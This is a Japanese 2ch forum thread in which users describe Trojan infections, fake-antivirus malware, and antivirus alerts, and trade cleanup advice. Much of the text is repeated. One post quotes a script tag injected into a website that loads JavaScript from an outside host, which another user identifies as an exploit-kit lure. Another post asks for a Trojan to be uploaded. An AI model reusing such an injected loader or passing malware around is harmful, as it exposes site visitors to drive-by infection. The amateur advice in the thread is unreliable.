予防措置と
併用セキュリティで自衛をするようにしましょう。
http://hibari.2ch.net/test/read.cgi/sec/1276269248/3
http://hibari.2ch.net/test/read.cgi/sec/1276269248/658
予防措置と
併用セキュリティで自衛をするようにしましょう。
567 :名無しさん@お腹いっぱい。:2010/10/02(土) 16:28:11
sshnas21に感染ー
実害はよく分からんが復元中のファイルにも感染して最高に鬱陶しかった
あとファイアウォールが無効化されてたがまあどうでもいいだろう
実害はよく分からんが復元中のファイルにも感染して最高に鬱陶しかった
あとファイアウォールが無効化されてたがまあどうでもいいだろう
568 :名無しさん@お腹いっぱい。:2010/10/04(月) 14:31:24
Generic19.AEFAの誤検出修正されたのかな?検出されなくなったわ
569 :名無しさん@お腹いっぱい。:2010/10/06(水) 09:48:56
AVGでGeneric19.AFGWキタ
AEFAじゃないから誤検出じゃないのか
検索しても何も出てこない
AEFAじゃないから誤検出じゃないのか
検索しても何も出てこない
570 :名無しさん@お腹いっぱい。:2010/10/13(水) 21:10:44
今AVGでエロゲからトロイみつけたって言われた。
びっくりして思わず即刻削除してしまったorz
きちんと名前確認しなかったし…。
このエロゲ、今友人に貸してるんだよなぁ。
びっくりして思わず即刻削除してしまったorz
きちんと名前確認しなかったし…。
このエロゲ、今友人に貸してるんだよなぁ。
571 :名無しさん@お腹いっぱい。:2010/10/14(木) 10:10:43
>>570
割れ厨乙って言っておく
割れ厨乙って言っておく
572 :名無しさん@お腹いっぱい。:2010/11/17(水) 21:21:19
Fake AV Trojan Download Activityとかいうのに感染したかもしれない
侵入を遮断しましたっていうメッセージが頻繁にでるんだけどこれはやばいのですか?
侵入を遮断しましたっていうメッセージが頻繁にでるんだけどこれはやばいのですか?
573 :ひみつの検疫さん:2024/12/27(金) 18:58:55 ID:MarkedRes
汚染を除去しました。
574 :名無しさん@お腹いっぱい。:2011/01/19(水) 18:05:21
ツイッターで以下のようなツイートを見ました
【ちょびっと拡散希望】
にんミュ竹谷役「白又敦」をやふー検索して一番上にでてくる
「白又敦 - ジャニーズプレミアム辞典」をクリックすると
トロイの木馬をふむので注意!【忍ミュクラスタ】
サイトを見てしまってから上の注意に気付いたのですが
平気でしょうか?
【ちょびっと拡散希望】
にんミュ竹谷役「白又敦」をやふー検索して一番上にでてくる
「白又敦 - ジャニーズプレミアム辞典」をクリックすると
トロイの木馬をふむので注意!【忍ミュクラスタ】
サイトを見てしまってから上の注意に気付いたのですが
平気でしょうか?
575 :名無しさん@お腹いっぱい。:2011/03/02(水) 21:56:14.44
219174 22419
576 :名無しさん@お腹いっぱい。:2011/04/09(土) 16:21:31.17
質問させてください。
AVIRAでトロイが検出されたので同ソフトの機能で一旦それを隔離し、隔離した物を消去しました。
再びPC全体をスキャンした際には検出されなくなったのですが、とりあえずは安心していいのでしょうか?
以前、「トロイは対処が大変で、最悪OSを入れ直す必要もある」
と聞いたことがあるので少々不安が残ってます。
AVIRAでトロイが検出されたので同ソフトの機能で一旦それを隔離し、隔離した物を消去しました。
再びPC全体をスキャンした際には検出されなくなったのですが、とりあえずは安心していいのでしょうか?
以前、「トロイは対処が大変で、最悪OSを入れ直す必要もある」
と聞いたことがあるので少々不安が残ってます。
577 :名無しさん@お腹いっぱい。:2011/04/26(火) 11:49:00.57
PC起動するたびにAVGFreeにてトロイが検出されます。
そのあと全スキャンしても何も検出されず
この状態はどういうことなのでしょうか
そのあと全スキャンしても何も検出されず
この状態はどういうことなのでしょうか
578 :何かくさい:2011/04/29(金) 18:23:05.85
レジストリの中にNvCplDaemon NvMediaCenterとあります
Runには application/x-msdownload
これはトロイですか?
そうであるならば、いつ仕込まれたか調べる方法とかありますか?
ちなみに msconfig にはコマンドRUNDULL32.EXEc:¥windoes¥system32とあります
Runには application/x-msdownload
これはトロイですか?
そうであるならば、いつ仕込まれたか調べる方法とかありますか?
ちなみに msconfig にはコマンドRUNDULL32.EXEc:¥windoes¥system32とあります
579 :名無しさん@お腹いっぱい。:2011/05/20(金) 12:05:59.58
昨日、Windows Vista Recovery [Trojan:Win32/Alureon.EP]ってやつに感染したw
どうやっても削除できなくて焦ったけど、セーフティーモードでスキャンしたらなんとか上手くいった
被害はデスクトップとスタートのアイコン、壁紙が全部消えたくらいだけど、なんか気持ち悪い
どうやっても削除できなくて焦ったけど、セーフティーモードでスキャンしたらなんとか上手くいった
被害はデスクトップとスタートのアイコン、壁紙が全部消えたくらいだけど、なんか気持ち悪い
580 :名無しさん@お腹いっぱい。:2011/05/23(月) 23:15:01.06
>>579
自分もひっかかった。ここ最近で増えてるトロイみたいだね
ttp://secur1ty.blog116.fc2.com/blog-entry-72.html
とりあえずMBAMかけてシステム復元してもう一度MBAMしといたけどやっぱ気持ち悪いね
自分もひっかかった。ここ最近で増えてるトロイみたいだね
ttp://secur1ty.blog116.fc2.com/blog-entry-72.html
とりあえずMBAMかけてシステム復元してもう一度MBAMしといたけどやっぱ気持ち悪いね
581 :名無しさん@お腹いっぱい。:2011/05/24(火) 03:26:47.73
>>579,580
そんなチンケなトロイにどうやったら感染するんだ?
Windows、JAVA、Adobe、Apple製品のアップデートなし、アンチウイルスなし、HIPSなし、IEのセキュリティ設定を最低な環境でも感染は防げるのに。
そんなチンケなトロイにどうやったら感染するんだ?
Windows、JAVA、Adobe、Apple製品のアップデートなし、アンチウイルスなし、HIPSなし、IEのセキュリティ設定を最低な環境でも感染は防げるのに。
582 :名無しさん@お腹いっぱい。:2011/05/25(水) 16:48:46.00
>>581
半年くらい前にウイルスバスターやめて、Microsoft Security Essentials使ってた
一応、検出して削除してるみたいだが、まんまとすり抜けられたw
今とりあえず、ノートンの体験版入れてる
半年くらい前にウイルスバスターやめて、Microsoft Security Essentials使ってた
一応、検出して削除してるみたいだが、まんまとすり抜けられたw
今とりあえず、ノートンの体験版入れてる
583 :名無しさん@お腹いっぱい。:2011/05/25(水) 22:15:00.87
>>582
アンチウイルスでしか防御ができない情弱乙。
アンチウイルスでしか防御ができない情弱乙。
584 :!ninjya:2011/05/27(金) 19:49:20.25
無理もない
585 :名無しさん@お腹いっぱい。:2011/05/30(月) 19:38:50.32
パンダの無料版ってマジで使えないわ
去年ウイルスバスター切れたから今年からこれ入れてたんだけど
知らない間にトロイ入ってたみたいで、ノーパソが途中で充電できなく
なったり勝手に電源落ちてたりで、しまいにゃHDDに異常があるような音すら
出てたからPCの買い替えを考えてたんだけど、偶然ウイルスバスタークラウドが
を借りて入れたらトロイ消してくれてPCの不調も一気に消えとんだw
ようはトロイ怖いしパンダは使えないってことです。
去年ウイルスバスター切れたから今年からこれ入れてたんだけど
知らない間にトロイ入ってたみたいで、ノーパソが途中で充電できなく
なったり勝手に電源落ちてたりで、しまいにゃHDDに異常があるような音すら
出てたからPCの買い替えを考えてたんだけど、偶然ウイルスバスタークラウドが
を借りて入れたらトロイ消してくれてPCの不調も一気に消えとんだw
ようはトロイ怖いしパンダは使えないってことです。
586 : 忍法帖【Lv=1,xxxP】 :2011/05/30(月) 21:01:37.69
Windows Vista Recoveryに感染したら
HDD中身はあるが表示されなくなるという状態になりました
誰か助けてください
HDD中身はあるが表示されなくなるという状態になりました
誰か助けてください
587 :名無しさん@お腹いっぱい。:2011/05/30(月) 23:34:26.56
俺も今日Windows7 Recoveryにかかった
ウイルスには無知だからかなり焦った
とりあえず司令官なんちゃらって個人のブログに対処法書いてあって助かった
ウイルスには無知だからかなり焦った
とりあえず司令官なんちゃらって個人のブログに対処法書いてあって助かった
588 :名無しさん@お腹いっぱい。:2011/05/31(火) 07:25:58.69
俺もかかったけど感染した仲間がたくさんいて安心したw
PCリカバリした直後で更新プログラム入れてなかったせいかもしれん
トロイって気づくのに小一時間かかってしもたw
PCリカバリした直後で更新プログラム入れてなかったせいかもしれん
トロイって気づくのに小一時間かかってしもたw
589 :名無しさん@お腹いっぱい。:2011/05/31(火) 08:12:40.70
有料版のセキュリティベンダーのいくつかはそのHPにトロイが含まれていることを知っていて、ユーザーが接続要求してもブラウザでチョンと切断する
ようなしくみになってきてるんだよ→最近の傾向として、有料版のセキュリティベンダーのいくつかはねw
無料で利用させている意味、有料である意味はそこにある
ようなしくみになってきてるんだよ→最近の傾向として、有料版のセキュリティベンダーのいくつかはねw
無料で利用させている意味、有料である意味はそこにある
590 :名無しさん@お腹いっぱい。:2011/05/31(火) 10:27:00.21
今頃そんな事やりだしたのか?
avastやAVGは昔から無料版でやってるぞ
avastやAVGは昔から無料版でやってるぞ
591 :名無しさん@お腹いっぱい。:2011/05/31(火) 20:54:23.24
Windows Recoveryに掛かったやつは割れ厨だろ
592 :名無しさん@お腹いっぱい。:2011/06/01(水) 17:32:03.56
windows Recoveryは削除して表向きは問題無くなったけど
MSofficeがごっそり消えてる件について
MSofficeがごっそり消えてる件について
593 :名無しさん@お腹いっぱい。:2011/06/02(木) 20:10:24.64
Generic dropper.va.gen.tに感染しました。
デスクトップ配下が全て隠しフォルダに変更され、
スタートプログラム配下の登録が全て消去されていました。
駆除後、セーフモードでハードディスクをフルスキャンしたところ
いなくなったようにみえます。
ググってみても情報が少ないので同じトロイにかかったことのある方いたら
どういった症状がでてどういう対処で直ったか教えてください。
デスクトップ配下が全て隠しフォルダに変更され、
スタートプログラム配下の登録が全て消去されていました。
駆除後、セーフモードでハードディスクをフルスキャンしたところ
いなくなったようにみえます。
ググってみても情報が少ないので同じトロイにかかったことのある方いたら
どういった症状がでてどういう対処で直ったか教えてください。
594 :名無しさん@お腹いっぱい。:2011/06/02(木) 21:56:55.26
>>593
ここ見てみれば
【緊急!】ウイルス即行駆除方法【助けて!】Part4
http://hibari.2ch.net/test/read.cgi/sec/1231490187/
Trojanにかかったら、クリーンインストールしたほうがいいと思うけどね
ここ見てみれば
【緊急!】ウイルス即行駆除方法【助けて!】Part4
http://hibari.2ch.net/test/read.cgi/sec/1231490187/
Trojanにかかったら、クリーンインストールしたほうがいいと思うけどね
595 :名無しさん@お腹いっぱい。:2011/06/03(金) 14:41:29.84
596 :名無しさん@お腹いっぱい。:2011/06/24(金) 00:34:31.31
パソコンの調子が悪くなって、他のパソコンにHDDを持って行ってスキャンしたら
トロイの木馬が検出されました。
で、その後、OS再インストール、アンチウイルス(NOD32)も最新版にして、
よく行くサイトに行ったらアンチウイルスから接続を遮断すると警告でたので、
サイトのソースを見ると
<script type="text/javascript" src="http://alexeybakhtin.com/sidename.js"></script>
が入っていました。
これは、やはり、トロイなんでしょうか?
トロイの木馬が検出されました。
で、その後、OS再インストール、アンチウイルス(NOD32)も最新版にして、
よく行くサイトに行ったらアンチウイルスから接続を遮断すると警告でたので、
サイトのソースを見ると
<script type="text/javascript" src="http://alexeybakhtin.com/sidename.js"></script>
が入っていました。
これは、やはり、トロイなんでしょうか?
597 :名無しさん@お腹いっぱい。:2011/06/24(金) 06:38:51.72
598 :名無しさん@お腹いっぱい。:2011/06/24(金) 08:41:22.03
>>596
トロイを呼び寄せるためのスクリプトっぽい。
NISでアクセスしたら「Web Attack: Blackhole Toolkit Website 7」と出て接続が遮断された。
http://www.virustotal.com/file-scan/report.html?id=38727abc1c97f7cbbd0a3570e2310482092bffad8a7d61b1531e5d913ccae176-1308871641
トロイを呼び寄せるためのスクリプトっぽい。
NISでアクセスしたら「Web Attack: Blackhole Toolkit Website 7」と出て接続が遮断された。
http://www.virustotal.com/file-scan/report.html?id=38727abc1c97f7cbbd0a3570e2310482092bffad8a7d61b1531e5d913ccae176-1308871641
599 :名無しさん@お腹いっぱい。:2011/06/24(金) 15:34:10.67
600 :名無しさん@お腹いっぱい。:2011/06/24(金) 16:26:30.16
601 :名無しさん@お腹いっぱい。:2011/06/25(土) 04:07:43.17
>>600
情弱には信じてもらえないが、アンチウイルスに検出されないマルウェアも俺のWindows環境では無害。
情弱には信じてもらえないが、アンチウイルスに検出されないマルウェアも俺のWindows環境では無害。
602 :名無しさん@お腹いっぱい。:2011/06/26(日) 18:55:23.52
windows Recoveryに感染したいんだけど
どこにいけば発病できんの?
どこにいけば発病できんの?
603 :名無しさん@お腹いっぱい。:2011/06/26(日) 22:47:02.81
>>602
俺も知りたい
俺も知りたい
604 :名無しさん@お腹いっぱい。:2011/06/28(火) 15:24:17.95
>>601
管理者アカウント以外なら安全だと思ってる情弱君ですね
管理者アカウント以外なら安全だと思ってる情弱君ですね
605 :名無しさん@お腹いっぱい。:2011/07/06(水) 01:14:30.86
パソコンを起動のたびにアメリカの町の天気予報を表示するへんなウィジェットが立ち上がるようになった
ウィジェットなんて全くインストールした記憶もセットした記憶もないんだけどウィルス???
乗っ取られてないかどうやったら分かりますか?
ウィジェットなんて全くインストールした記憶もセットした記憶もないんだけどウィルス???
乗っ取られてないかどうやったら分かりますか?
606 :名無しさん@お腹いっぱい。:2011/08/29(月) 02:23:03.89
AVGがアラート→トロイ発見、隔離その1→AVGフルスキャン→ウイルス無し
→念のためシマネテックオンラインスキャン→トロイ発見、その2→手動で削除
→シェル拡張スキャン→ウイルス無し→一安心→数十分後、アラート→トロイ発見、その3
現状、目立つ被害無し。ただパスワード窃盗型っぽいのが混じっていたのでpixiv、ニコ動、Eメールその他のパスワードを全て変更するハメに
3種類とも名前の違うトロイだったが、バックドアを作られた臭いな
→念のためシマネテックオンラインスキャン→トロイ発見、その2→手動で削除
→シェル拡張スキャン→ウイルス無し→一安心→数十分後、アラート→トロイ発見、その3
現状、目立つ被害無し。ただパスワード窃盗型っぽいのが混じっていたのでpixiv、ニコ動、Eメールその他のパスワードを全て変更するハメに
3種類とも名前の違うトロイだったが、バックドアを作られた臭いな
607 :名無しさん@お腹いっぱい。:2011/08/29(月) 15:57:43.37
608 :名無しさん@お腹いっぱい。:2011/08/30(火) 01:56:19.64
609 :名無しさん@お腹いっぱい。:2011/09/17(土) 05:30:19.61
nortonの侵入検知が数秒おきに
DeepThroat トロイの木馬のデフォルト遮断の警告出すんだけど
これってやばい?
インバウンドUDPパケットって書いてあるけど
なんか感染したのかなぁ
DeepThroat トロイの木馬のデフォルト遮断の警告出すんだけど
これってやばい?
インバウンドUDPパケットって書いてあるけど
なんか感染したのかなぁ
610 :名無しさん@お腹いっぱい。:2011/09/18(日) 01:30:50.94
age
611 :名無しさん@お腹いっぱい。:2011/09/18(日) 12:21:44.16
や ば い
612 :名無しさん@お腹いっぱい。:2011/09/19(月) 04:05:39.17
613 :名無しさん@お腹いっぱい。:2011/09/19(月) 12:01:28.21
誰かtrojanpspbrickうpしてくれ。
614 :609:2011/09/20(火) 05:52:06.64
スキャンしてもなんも出ないし
シマンテックのセキュリティチェックも全部ステルスだし
ほっといてもいいのかな?
もうわけわかんないよ
シマンテックのセキュリティチェックも全部ステルスだし
ほっといてもいいのかな?
もうわけわかんないよ
数日間、固定されていたIPアドレスが変わった
侵入検知の警告は無くなった
IPアドレスが原因だったのだろうか
一体なんだったのか…安心していいのか…
侵入検知の警告は無くなった
IPアドレスが原因だったのだろうか
一体なんだったのか…安心していいのか…
616 :名無しさん@お腹いっぱい。:2011/09/21(水) 16:05:25.17
618 :名無しさん@お腹いっぱい。:2011/10/27(木) 03:01:12.65
感染してしまいました…
何故かここ最近起動もしたことないましろ色シンフォニーというゲームに感染してました
はぁ…カスペルスキー使ってるんですが処理してくれたのか分からない
何故かここ最近起動もしたことないましろ色シンフォニーというゲームに感染してました
はぁ…カスペルスキー使ってるんですが処理してくれたのか分からない
619 :名無しさん@お腹いっぱい。:2011/10/27(木) 18:43:35.25
割れ厨
620 :名無しさん@お腹いっぱい。:2011/10/28(金) 15:58:54.57
他スレでもかいたんだが原因となっているファイルがフレッツ接続ツールとボリュームのファイルなんだ
これってもしかして誤検出?
これってもしかして誤検出?
621 :名無しさん@お腹いっぱい。:2011/10/28(金) 16:07:19.09
ぐぐると同じような症状で最近の人見かけるし…ファイル名にpswが入ってるからパス窃盗型?だよな…
622 :名無しさん@お腹いっぱい。:2011/10/29(土) 13:42:27.66
adobeアップデートしてたら、MSEさんが「Trojan:Win32/Lukicsel.I」 っての検出して
アップデート強制終了しちゃうんだけど、ひょっとしてadobeやばいの?
アップデート強制終了しちゃうんだけど、ひょっとしてadobeやばいの?
623 :名無しさん@お腹いっぱい。:2011/11/07(月) 04:46:16.60
ウィルスバスター2010だけどルーター使わずモデムに直線繋いでるから危険だなぁ
月に3匹くらい見つかるけどヤバい?
月に3匹くらい見つかるけどヤバい?
624 :名無しさん@お腹いっぱい。:2011/12/27(火) 05:10:27.70
Symantec Security Checkセキュリティスキャン結果が
「セキュリティ状態:状態不明 スキャンの結果、脆弱性の状態が判断できませんでした。」
やばい?
「セキュリティ状態:状態不明 スキャンの結果、脆弱性の状態が判断できませんでした。」
やばい?
625 :名無しさん@お腹いっぱい。:2012/01/15(日) 10:15:55.14
トロイの木馬は消去したデータを復元させて情報を流出させるということを行ったりしますか?
トロイの木馬に感染していたようなので気になりました。
トロイの木馬に感染していたようなので気になりました。
626 :名無しさん@お腹いっぱい。:2012/01/15(日) 10:18:58.06
見境無くマルチしすぎだろ
627 :名無しさん@お腹いっぱい。:2012/01/26(木) 23:33:58.71
windows recovery の亜種に感染したよ
windowsupdateしてないpcでアフィブログ閲覧してただけだったがサイトが感染していたみたいだ
ウィルスバスターがよくわからんURLを頻繁にブロックするなーとみてたらブラウザが急に落ちて
例の偽セキュリティソフトが立ち上がりやがった
windowsupdateしてないpcでアフィブログ閲覧してただけだったがサイトが感染していたみたいだ
ウィルスバスターがよくわからんURLを頻繁にブロックするなーとみてたらブラウザが急に落ちて
例の偽セキュリティソフトが立ち上がりやがった
トレンドマイクロのブログとかみてなんとか削除できたけどすべてのプログラムが隠された状態だったのが、
ほとんどのプログラムが隠されたまま復活しない、Program filesにあるexeファイルならなんとか手作業で戻せそうだが、
システムの復元とかどう復活させればいいんだ
OSがXPだからか
ショートカットも残ったままだし
ウィルスかかってからもう3時間以上悩んでいるがわからん
ほとんどのプログラムが隠されたまま復活しない、Program filesにあるexeファイルならなんとか手作業で戻せそうだが、
システムの復元とかどう復活させればいいんだ
OSがXPだからか
ショートカットも残ったままだし
ウィルスかかってからもう3時間以上悩んでいるがわからん
629 :名無しさん@お腹いっぱい。:2012/02/02(木) 13:42:14.38
慌ててしまってチラ裏にしかならないんだが、一応報告
・2/1、IE8(OSはXP)でブラウズ中にMSEがExploit:win32/Pdfjsc.RMの検知を警告
・削除→気持ち悪かったので、再起動
・再起動後、再度同じ警告→削除
・IE8の動作が猛烈に遅くなる
・PC、モデム、ルーターの再起動を繰り返しても治らない;;
・システムの復元を行ったところ治ったw
・2/1、IE8(OSはXP)でブラウズ中にMSEがExploit:win32/Pdfjsc.RMの検知を警告
・削除→気持ち悪かったので、再起動
・再起動後、再度同じ警告→削除
・IE8の動作が猛烈に遅くなる
・PC、モデム、ルーターの再起動を繰り返しても治らない;;
・システムの復元を行ったところ治ったw
本文長いと一度に投稿できないのね
(続き)
3年くらいやっていなかったWindowsUpdateをやってから、
MSEの定義ファイルを最新にして、フルスキャン→問題なし
シマンテックのオンラインスキャン→問題なし
セキュリティーソフト使っていても絶対安心ではないことが身にしみてわかりました
(続き)
3年くらいやっていなかったWindowsUpdateをやってから、
MSEの定義ファイルを最新にして、フルスキャン→問題なし
シマンテックのオンラインスキャン→問題なし
セキュリティーソフト使っていても絶対安心ではないことが身にしみてわかりました
631 :名無しさん@お腹いっぱい。:2012/02/03(金) 01:06:54.86
トレンドマイクロ オンラインスキャンを行ったら
wpbt0.dllというトロイの木馬が検出されたのですが、どのようなウイルスなのでしょうか
ぐぐって調べても良く分かりません
wpbt0.dllというトロイの木馬が検出されたのですが、どのようなウイルスなのでしょうか
ぐぐって調べても良く分かりません
632 :名無しさん@お腹いっぱい。:2012/02/15(水) 11:00:15.55
今はもう解決したけど、2年前にトロイに感染した。
勝手にファイアーウォールを無効にされたw
すぐに気付いたからよかったけど。
勝手にファイアーウォールを無効にされたw
すぐに気付いたからよかったけど。
633 :名無しさん@お腹いっぱい。:2012/02/20(月) 15:41:26.65
Yahoo!スポーツを見ようとしたらトロイの木馬を検出して隔離しましたって言われた。
日時は、2月20日(月)午後15時35分頃のできごと。
セキュリティーソフトはMcAfee。
だれか同じようにYahoo!スポーツでトロイの木馬検出した奴いる?
McAfeeの誤作動なのか、はたまた超メジャーなサイトに巧みに組み込まれたウィルスなのか?
結構気になるな。
日時は、2月20日(月)午後15時35分頃のできごと。
セキュリティーソフトはMcAfee。
だれか同じようにYahoo!スポーツでトロイの木馬検出した奴いる?
McAfeeの誤作動なのか、はたまた超メジャーなサイトに巧みに組み込まれたウィルスなのか?
結構気になるな。
634 :名無しさん@お腹いっぱい。:2012/03/07(水) 21:39:33.14
職場のパソコンがトロイの木馬に感染したようなんですが、感染したパソコンにUSBやカメラのSDカードを差し込むとそのUSBやSDカードも感染するのでしょうか?
教えてください。
教えてください。
635 :名無しさん@お腹いっぱい。:2012/03/08(木) 00:43:30.12
>>634
やってみれば分かる
やってみれば分かる
636 :名無しさん@お腹いっぱい。:2012/03/14(水) 23:02:10.34
Trojan-Dropper.Win32.Genome.fheってやばそうなのが出てきたんだけど
これはどういうタイプ?エロサイトとかで感染したのかな
これはどういうタイプ?エロサイトとかで感染したのかな
637 :名無しさん@お腹いっぱい。:2012/04/02(月) 02:36:57.09
今夜寝れないよ。格闘中。立ち上げると画面真っ黒でゴミ箱しかでない。
トロイ検出されて駆除ツールで隔離・削除したんだが…
トロイ検出されて駆除ツールで隔離・削除したんだが…
638 :名無しさん@お腹いっぱい。:2012/04/03(火) 01:47:44.38
あのさ、リカバリした方が良いべ
639 :名無しさん@お腹いっぱい。:2012/04/03(火) 17:09:56.84
あるウイルス対策ソフトで、某巨大ゲームの起動のファイルの一つがトロイの木馬として隔離されました。
大丈夫だろと思って無視して実行しましたが、その後、窓のファイアウォールが勝手に無効になってるのに気づき、有効にしなおしました。
関連があるのでしょうか?
それと、このままほっておくと、ヤバイでしょうか?
大丈夫だろと思って無視して実行しましたが、その後、窓のファイアウォールが勝手に無効になってるのに気づき、有効にしなおしました。
関連があるのでしょうか?
それと、このままほっておくと、ヤバイでしょうか?
640 :弘道会:2012/04/13(金) 18:32:28.09
知り合いで弘道会の腰抜け〜” やっております。
焼け焦げた⇒デブ”
ガンブラーのサンド・アイアンさん。
しかにしても弘道会=弱ぇ〜”
弱ぇ〜”弱ぇ〜”弱ぇ〜”弱ぇ〜”弱ぇ〜”
焼け焦げた⇒デブ”
ガンブラーのサンド・アイアンさん。
しかにしても弘道会=弱ぇ〜”
弱ぇ〜”弱ぇ〜”弱ぇ〜”弱ぇ〜”弱ぇ〜”
641 :名無しさん@お腹いっぱい。:2012/06/14(木) 11:35:56.62
お前は頭が弱そうだな
642 :名無しさん@お腹いっぱい。:2012/07/03(火) 01:18:56.14
TROJ_SIREFEFってrootkitはトレンドマイクロのオンラインスキャンで検出できる?
643 :名無しさん@お腹いっぱい。:2012/07/04(水) 16:34:58.49
ADOBE更新しろって出てきて更新したらトロイ検知した
ノートンで完全スキャンしても数分ごとに脅威を遮断しましたとか出る・・・
リカバリするしかないのか
ノートンで完全スキャンしても数分ごとに脅威を遮断しましたとか出る・・・
リカバリするしかないのか
644 :名無しさん@お腹いっぱい。:2012/07/06(金) 01:43:45.84
いまリカバリしてきた。絶対呪ってやるから。
645 :名無しさん@お腹いっぱい。:2012/07/07(土) 03:17:29.38
AVG Anti-Virusフリー版を使用しているのですが、「トロイの木馬GENERIC28.AUQH」に
感染したと警告が出ました。感染したファイルは「c¥windows¥assembly¥GAC¥Desktop.ini」です。
除去?しようとしても「アクセスが拒否されました」となります。どう対処すればいいんでしょうか?
Firefox12.0を起動するたびに「感染した」という警告が出るのですが、Firefoxが関係しているのでしょうか?
感染したと警告が出ました。感染したファイルは「c¥windows¥assembly¥GAC¥Desktop.ini」です。
除去?しようとしても「アクセスが拒否されました」となります。どう対処すればいいんでしょうか?
Firefox12.0を起動するたびに「感染した」という警告が出るのですが、Firefoxが関係しているのでしょうか?
646 :645:2012/07/07(土) 03:19:43.01
つづきです。
「GENERIC28.AUQH」についてグーグルで検索しても日本語のサイトは見つからず、英語のサイトでは
駆除方法が書かれているのですが、ちょっと怖くて出来ません。
どなたかアドバイスをお願いします。
「GENERIC28.AUQH」についてグーグルで検索しても日本語のサイトは見つからず、英語のサイトでは
駆除方法が書かれているのですが、ちょっと怖くて出来ません。
どなたかアドバイスをお願いします。
ウイルス対策ソフトでも駆除できずにトロイとか他にも色々数分ごとに検出されてたから
思い切ってリカバリしたら駆除できた
ついでにネットとかネトゲも軽くなって得したw
>>645
あんまりPC詳しくないのですがアクセス権がないとかじゃないですかね
まあ実際ウイルスなんて検出仕切れてないこともあるから
リカバリする方が確実だし手っ取り早いと思いますよ
思い切ってリカバリしたら駆除できた
ついでにネットとかネトゲも軽くなって得したw
>>645
あんまりPC詳しくないのですがアクセス権がないとかじゃないですかね
まあ実際ウイルスなんて検出仕切れてないこともあるから
リカバリする方が確実だし手っ取り早いと思いますよ
648 :名無しさん@お腹いっぱい。:2012/07/07(土) 22:17:56.62
ベクターでダウンロードしたフリーソフト(zipファイル)を解凍したんですが、
そのあとでAVGでスキャンしたらトロイの木馬がみつかりました。
zipファイルをスキャンすると4個で解凍した後のフォルダをスキャンすると3個みつかるということは、
1個は感染してしまったということになるのでしょうか?
(ソフト名).exe:\{app}\sponsors\kso_download.exe";"トロイの木馬Dropper.Generic3.AEBC";
(ソフト名).exe:\{app}\sponsors\kis_download.exe";"トロイの木馬Dropper.Generic3.AEBB";
(ソフト名).zip:\(ソフト名).exe";"トロイの木馬Dropper.Generic3.AEBC";
(ソフト名).zip";"トロイの木馬Dropper.Generic3.AEBC";
zipも解凍したフォルダも削除してAVGでスキャンしたら何もみつからないのですが、
リカバリしたほうがいいでしょうか?
そのあとでAVGでスキャンしたらトロイの木馬がみつかりました。
zipファイルをスキャンすると4個で解凍した後のフォルダをスキャンすると3個みつかるということは、
1個は感染してしまったということになるのでしょうか?
(ソフト名).exe:\{app}\sponsors\kso_download.exe";"トロイの木馬Dropper.Generic3.AEBC";
(ソフト名).exe:\{app}\sponsors\kis_download.exe";"トロイの木馬Dropper.Generic3.AEBB";
(ソフト名).zip:\(ソフト名).exe";"トロイの木馬Dropper.Generic3.AEBC";
(ソフト名).zip";"トロイの木馬Dropper.Generic3.AEBC";
zipも解凍したフォルダも削除してAVGでスキャンしたら何もみつからないのですが、
リカバリしたほうがいいでしょうか?
649 :名無しさん@お腹いっぱい。:2012/07/08(日) 23:01:07.16
202.208.206.43
やまひらという化粧品メーカーですが、ここにアクセスしたら
トロイという警告が出ました。
どうやったら駆除できるんでしょうか
やまひらという化粧品メーカーですが、ここにアクセスしたら
トロイという警告が出ました。
どうやったら駆除できるんでしょうか
651 :名無しさん@お腹いっぱい。:2012/07/16(月) 11:33:57.82
.NET Runtime Errorダイアログがでて、実行元があやしいんだけど
ググっても何も出てこない。。。アンチウィルスはMSSE、Win7、いまフルスキャン中
なんかのトロイかね
System.Reflection.TargetInvocationException: 呼び出しのターゲットが例外をスローしました。 ---> System.ComponentModel.Win32Exception: %1 は有効な Win32 アプリケーションではありません。
場所 System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)
場所 System.Diagnostics.Process.Start()
場所 System.Diagnostics.Process.Start(ProcessStartInfo startInfo)
場所 System.Diagnostics.Process.Start(String fileName)
場所 N3o.Night.Main()
Sympathy Stresser
アセンブリ バージョン: 1.0.0.0
Win32 バージョン: 1.0.0.0
コードベース: file:///C:/Users/*****/AppData/Local/Temp/083cc9ee.tmp
N3oDLL
アセンブリ バージョン: 1.0.0.0
Win32 バージョン: 1.0.0.0
コードベース: file:///C:/Users/****/AppData/Local/Temp/083cc9ee.tmp
ググっても何も出てこない。。。アンチウィルスはMSSE、Win7、いまフルスキャン中
なんかのトロイかね
System.Reflection.TargetInvocationException: 呼び出しのターゲットが例外をスローしました。 ---> System.ComponentModel.Win32Exception: %1 は有効な Win32 アプリケーションではありません。
場所 System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)
場所 System.Diagnostics.Process.Start()
場所 System.Diagnostics.Process.Start(ProcessStartInfo startInfo)
場所 System.Diagnostics.Process.Start(String fileName)
場所 N3o.Night.Main()
Sympathy Stresser
アセンブリ バージョン: 1.0.0.0
Win32 バージョン: 1.0.0.0
コードベース: file:///C:/Users/*****/AppData/Local/Temp/083cc9ee.tmp
N3oDLL
アセンブリ バージョン: 1.0.0.0
Win32 バージョン: 1.0.0.0
コードベース: file:///C:/Users/****/AppData/Local/Temp/083cc9ee.tmp
652 :名無しさん@お腹いっぱい。:2012/07/16(月) 23:01:03.78
TDL4にやられた
653 :名無しさん@お腹いっぱい。:2012/07/17(火) 10:20:53.32
トロイに感染したよ。
いきなりCPUの温度が沸騰しちゃうよぉ ってな温度になりやがったww
それで早期発見できたからよかったが、こわかったから結局OSを再インスコしたよ。 動作を気にしないソフトとかは全部外付けHDDにいれといたから復旧が楽だったな。
いきなりCPUの温度が沸騰しちゃうよぉ ってな温度になりやがったww
それで早期発見できたからよかったが、こわかったから結局OSを再インスコしたよ。 動作を気にしないソフトとかは全部外付けHDDにいれといたから復旧が楽だったな。
654 :名無しさん@お腹いっぱい。:2012/07/20(金) 08:57:52.18
AppData\Roamingに0.exeってのが消しても消しても作られてなにが原因かさっぱりわからない
avastで何度スキャンしてもAppData\Local\Temp\005bf20.exeってのが一個だけ高圧縮ファイル爆弾ですと引っかかって削除もチェストに移動もできない
隠しファイルは表示にしてるけどこの005bf20.exeってのは見当たらない
何かコレっていう可能性のものありますか?誤診断ですかね
avastで何度スキャンしてもAppData\Local\Temp\005bf20.exeってのが一個だけ高圧縮ファイル爆弾ですと引っかかって削除もチェストに移動もできない
隠しファイルは表示にしてるけどこの005bf20.exeってのは見当たらない
